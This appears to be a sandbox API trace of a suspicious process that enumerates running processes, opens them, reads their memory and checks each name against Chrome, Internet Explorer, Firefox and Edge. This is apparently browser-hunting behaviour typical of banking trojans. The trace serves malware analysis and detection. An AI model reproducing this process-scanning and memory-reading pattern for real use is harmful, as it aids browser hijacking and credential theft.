	[0244.694] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.694] NtQueryInformationProcess (in: ProcessHandle=0x9048, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.694] ReadProcessMemory (in: hProcess=0x9048, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.694] ReadProcessMemory (in: hProcess=0x9048, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.695] ReadProcessMemory (in: hProcess=0x9048, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.695] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x904c
	[0244.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.696] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.696] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.696] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.697] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9050
	[0244.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.698] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0244.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.698] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.698] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0244.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.699] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9054
	[0244.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.700] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.700] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.701] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.701] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9058
	[0244.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.704] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.705] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.705] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x905c
	[0244.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.706] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.707] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.707] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9060
	[0244.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.708] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.708] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.709] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.709] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9064
	[0244.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.710] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.711] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.711] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.711] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9068
	[0244.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.713] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.713] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.713] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.714] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x906c
	[0244.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.715] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0244.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.715] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.715] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0244.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.715] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9070
	[0244.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.717] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.717] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.717] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.718] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9074
	[0244.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.719] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0244.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.719] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.720] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0244.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.720] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9078
	[0244.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.724] CloseHandle (hObject=0x4fd0) returned 1
	[0244.724] Sleep (dwMilliseconds=0x64) 
	[0244.828] GetCurrentProcessId () returned 0x110
	[0244.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0244.833] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0244.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0244.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0244.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x907c
	[0244.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.838] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.839] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.839] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.840] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9080
	[0244.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.842] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.842] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.842] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.843] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0244.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9084
	[0244.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.844] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0244.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.844] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.844] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0244.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.845] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9088
	[0244.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.846] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.846] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.846] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.847] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x908c
	[0244.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.848] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0244.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.848] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.848] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0244.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.849] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9090
	[0244.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.850] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0244.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.850] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.850] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0244.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.851] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.851] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9094
	[0244.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.852] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0244.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.852] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.852] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0244.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.853] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9098
	[0244.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.854] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.854] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.854] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.855] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.855] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x909c
	[0244.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.856] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.856] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.856] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.857] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x90a0
	[0244.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.858] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.858] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.858] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.859] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x90a4
	[0244.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.860] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
